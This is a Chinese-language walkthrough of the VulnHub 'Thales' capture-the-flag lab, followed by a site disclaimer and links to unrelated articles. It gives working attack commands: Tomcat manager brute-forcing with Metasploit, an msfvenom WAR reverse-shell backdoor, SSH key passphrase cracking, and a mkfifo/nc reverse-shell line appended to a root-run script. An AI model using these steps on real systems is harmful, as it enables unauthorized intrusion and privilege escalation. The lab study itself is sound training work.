vulnhub靶场之Thales

一.环境搭建

1.靶场描述

Description : Open your eyes and change your perspective
includes 2 flags:user.txt and root.txt.
Telegram: @machineboy141 (for any hint)
This works better with VIrtualBox rathe than VMware

2.靶场地址

https://www.vulnhub.com/entry/thales-1,749/
 

image-20240129163223146

3.启动靶场

Thales靶机在VMware运行会出现bug,所以我们在VirtualBox运行。

image-20240129163328402

虚拟机开启之后界面如上,我们不知道ip,需要自己探活,因为我们在VirtualBox运行所以网段发生了变化,网段知道:192.168.1.0/24

二.渗透测试

1.目标

目标就是我们搭建的靶场,靶场IP为:192.168.1.0/24

2.信息收集

(1)寻找靶场真实ip

nmap -sP 192.168.1.0/24
 

image-20240129163940132

arp-scan -l
 

image-20240129164229619

靶场真实ip地址为192.168.1.13

(2)探测端口及服务

nmap -p- -sV 192.168.1.13
 

image-20240129164045121

发现开启了22端口,OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
发现开启了8080端口,Apache Tomcat 9.0.52
 

(3)web指纹识别

whatweb -v 192.168.1.13:8080
 

image-20240129164342897

3.渗透测试

(1)访问web服务

http://192.168.1.13:8080
 

image-20240129164445794

我们可以看到是Tomcat

(2)扫描web服务

1)棱洞3.0指纹识别
./EHole_linux_amd64 finger -u http://192.168.1.13:8080
 

image-20240129164921542

2)nikto扫描网站结构
nikto -h http://192.168.1.13:8080
 
3)dirsearch目录扫描
dirsearch -u 192.168.1.13:8080 -e * -x 403 --random-agent
 

我们扫描到一个登录页面

http://192.168.1.13:8080/manager
 

image-20240129165606671

目前,我们掌握的信息是一个tomcat框架和一个登录页面,因为tomcat 有管理登录页面,于是尝试爆破

(3)渗透测试

1)msf爆破
search login tomcat
 

image-20240129170544353

show options
 
set RHOSTS 192.168.1.13
 

image-20240129170723929

爆破出来一个用户名和密码

image-20240129170810334

tomcat:role1

2)登录

我们可以看到登录成功

image-20240129170852364

3)反弹shell

我们可以看到/shell和上传页面,那么我们进行shell,在 web 应用程序部署界面尝试在上传 war 包反弹 shell

image-20240129171145361

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.9 LPORT=666666 -f war -o MS02423.war
 

image-20240129172804028

我们进行上传

image-20240129172724391

上传成功后,在应用程序列表中看到已成功部署了 war 后门,点击访问后反弹

image-20240129172826998

我们可以看到反弹成功

我们进行提权,发现需要密码,我们进行查找

image-20240129173210637

4)执行脚本

一般情况下,我们首先去home目录下查看,然后在去/var/www/html/目录下查看有没有什么线索,我们看到了thales命令,我们进行查看

image-20240130161433886

我们看到了两个txt文件,模式里面提示我们,一个flag在user.txt,一个在root.txt里面,那么我们进行查看user.txt文件,但是需要thales权限,我们查看notes.txt文件,notes.txt 中告诉我们有一个备用脚本在 /usr/local/bin/backup.sh

includes 2 flags:user.txt and root.txt.
 

image-20240130161558059

image-20240130161920839

我们去执行这个脚本,但是执行之后却发现没有如何变化

5)ssh 私钥文件

我们在thales目录下发现了隐藏的.ssh文件,我们进行查看

image-20240130162530044

这样看太难受了,我们进行交互模式进行查看

image-20240130162852020

我们可以看到公钥,我们进行查看

我们把它保存下来,用john进行爆破

6)john爆破

将私钥文件保存到攻击机,利用 ssh2john 将私钥转化为 john 能处理的 SHA 加密的文件,然后进行爆破,得到密码为 vodka06

image-20240130170943990

image-20240130171014530

image-20240130171045172

7)查看user.txt文件

我们进行登录thales用户名

image-20240130171432515

我们获取到第一个flag,还有一个flag在root.txt里面,我们进行提权

8)提权

之前我们看到的那个脚本还没有查看内容,现在我们查看一下那个备份文件的代码

image-20240130171752726

是一个shell文件,并且是能运行命令的,我们是可以编辑的,并且是root用户运行的,我们插入一串反弹shell的命令

image-20240130171844539

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.9 5555 >/tmp/f" >> backup.sh
 

image-20240130172619811

等一会可以看到反弹成功,我们查看flag即可

image-20240130172935974

三.相关资源

1.靶场下载地址

2.nmap

3.arp-scan

4.masscan

5.[ 常用工具篇 ] 渗透神器 whatweb 安装使用详解

6.[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解(linux & win)

7.nikto工具的使用

8.dirsearch目录扫描

9.msf工具使用

10.ssh私钥文件

11.john爆破密码

12.反弹shell

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/669078.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

ensp实验合集(二)

实验6 VLAN划分....................................................................... - 30 - 实验7 路由器调试及常用命令使用........................................ - 42 - 实验8 配置静态路由器............................................................…

GCC编译器的使用以及使用Makefile语法进行操控

Makefile 这里使用的Makefile操控编译器 gcc 常见的组成部分 c: gcc 的一个版本,默认语言设置为 C,而且在链接的时候自动包含标准 C 库。这和 g 一样configure: GCC 源代码树根目录中的一个脚本。用于设置配置值和创建 GCC 编…

pytest中fixture的使用方法

一、pytest中的fixture是什么 为可靠的和可重复执行的测试提供固定的基线(可以理解为测试的固定配置,使不同范围的测试都能够获得统一的配置),fixture提供了区别于传统单元测试(setup/teardown)风格的令人…

2024最新版鸿蒙HarmonyOS开发工具安装使用指南

2024最新版鸿蒙HarmonyOS开发工具安装使用指南 By JacksonML 0. 什么是鸿蒙Harmony OS? 华为鸿蒙系统(HUAWEI Harmony OS),是华为公司在2019年8月9日于东莞举行的华为开发者大会(HDC.2019)上正式发布的分…

蓝桥杯每日一题-----数位dp练习

题目 链接 参考代码 写了两个,一个是很久以前写的,一个是最近刚写的,很久以前写的时候还不会数位dp所以写了比较详细的注释,这两个代码主要是设置了不同的记忆数组,通过这两个代码可以理解记忆数组设置的灵活性。 im…

redis源码之:集群创建与节点通信(1)

一、创建集群与添加节点(meet) 通过redis源码之:redis-cli 集群命令发现,不管是新建cluster集群还是往集群里添加新节点,都是通过meet指令完成,假设有ABCD四个节点,新建集群:redis-…

Vue学习笔记之组件基础

1、组件的定义 一般将 Vue 组件定义在一个单独的 .vue 文件中,称做单文件组件;当然也可以将组件直接定义在js文件中,如下js代码,定义一个组件BlogPost,通过props定义对外暴露属性title,父组件传递title&am…

分享62个节日PPT,总有一款适合您

分享62个节日PPT,总有一款适合您 62个节日PPT下载链接:https://pan.baidu.com/s/1mheNtIvXknGHse44FW7nOw?pwd6666 提取码:6666 Python采集代码下载链接:采集代码.zip - 蓝奏云 学习知识费力气,收集整理更不易…

2023年全球软件架构师峰会(ArchSummit上海站):核心内容与学习收获(附大会核心PPT下载)

微服务架构是当今软件架构的主流趋势之一。随着云计算和分布式系统的普及,越来越多的企业开始采用微服务架构来构建他们的应用。微服务架构可以将一个大型的应用拆分成多个小型的服务,每个服务都独立部署、独立运行,并通过轻量级的通信协议进…

非常好看的CSS加载中特效,引用css文件既可用

非常好看的CSS加载中特效 demo效果源码&#xff1a; <!DOCTYPE html5> <head><link rel"stylesheet" type"text/css" href"demo.css"/><link rel"stylesheet" type"text/css" href"loaders.css&…

【Qt解决】QIcon图标不显示以及LNK2019: 无法解析的外部符号问题

一句话解决 qmake重新构建&#xff0c;然后build&#xff0c;然后run 原因剖析 QIcon图标不显示 首先确保 qrc 文件已经添加对应图标文件&#xff0c;但是仍然不显示是因为没有编译新文件 LNK2019: 无法解析的外部符号 明明已经定义的槽函数&#xff0c;还是报这个错&…

开发板有线连主机,主机无线上网,开发板上网

网络配置&#xff1a; 以太网4连接开发板 wlan设置共享 vmwave需要禁用&#xff08;否则占用共享地址192.168.137.1&#xff09; 开发板 /etc/netplan 目录下&#xff1a;xx.yaml 00-installer-config.yaml /etc/resolv.conf route -n ifconfig 可以ping主机 可ping自己…

SpringBoot中的WebMvcConfigurer

SpringBoot中的WebMvcConfigurer 一、WebMvcConfigurer二、页面跳转控制器三、数据格式化1.Formatter\<T>2.内容转换器 四、拦截器 一、WebMvcConfigurer WebMvcConfigurer 作为配置类&#xff0c;采用 JavaBean 的形式来代替传统的 XML 配置文件形式&#xff0c;进而针…

SpringSecurity(18)——OAuth2授权码管理

AuthorizationCodeServices public interface AuthorizationCodeServices {//为指定的身份验证创建授权代码。String createAuthorizationCode(OAuth2Authentication authentication);//使用授权码。OAuth2Authentication consumeAuthorizationCode(String code)throws Invali…

C/C++实现无序入参的命令解析工具

C/C实现无序入参的命令解析工具 1 实现思路2 主要功能3 效果展示3.1 直接运行代码图3.2help命令执行效果图3.3命令行执行命令解析效果图 4 代码实现5 代码下载 1 实现思路 基本介绍&#xff1a; 思路来源于atlas,atc(模型转换工具)&#xff0c;该工具对命令支持众多&#xff0…

机器学习的整个流程

机器学习的整个流程定义了数据科学团队执行以创建和交付机器学习模型的工作流。此外&#xff0c;机器学习流程还定义了团队如何协作合作&#xff0c;以创建最有用的预测模型。 机器学习high level的流程 机器学习流程的关键步骤包括问题探索&#xff08;Problem Exploration&a…

幻兽帕鲁服务器怎么搭建?Palworld多人联机教程

玩转幻兽帕鲁服务器&#xff0c;阿里云推出新手0基础一键部署幻兽帕鲁服务器教程&#xff0c;傻瓜式一键部署&#xff0c;3分钟即可成功创建一台Palworld专属服务器&#xff0c;成本仅需26元&#xff0c;阿里云服务器网aliyunfuwuqi.com分享2024年新版基于阿里云搭建幻兽帕鲁服…

http伪造本地用户字段系列总结

本篇记录了http伪造本地用户的多条字段&#xff0c;便于快速解决题目 用法举例&#xff1a; 直接把伪造本地用户的多个字段复制到请求头中&#xff0c;光速解决部分字段被过滤的问题。 Client-IP: 127.0.0.1 Forwarded-For-Ip: 127.0.0.1 Forwarded-For: 127.0.0.1 Forwarded…

(4)【Python数据分析进阶】Machine-Learning模型与算法应用-回归、分类模型汇总

线性回归、逻辑回归算法应用请参考: https://codeknight.blog.csdn.net/article/details/135693621https://codeknight.blog.csdn.net/article/details/135693621本篇主要介绍决策树、随机森林、KNN、SVM、Bayes等有监督算法以及无监督的聚类算法和应用PCA对数据进行降维的算法…

CSS的Day05(浮动+flex布局)

跟着黑马程序员的课&#xff0c;稍稍对CSS的了解 常见的显示模式&#xff1a;行内、块级、行内块 在HTML中&#xff0c;标准流也称为文档流或普通流&#xff0c;是指元素按照其在HTML文档中的出现顺序依次排列的方式。在标准流中&#xff0c;元素会自动占据父容器的空间&#…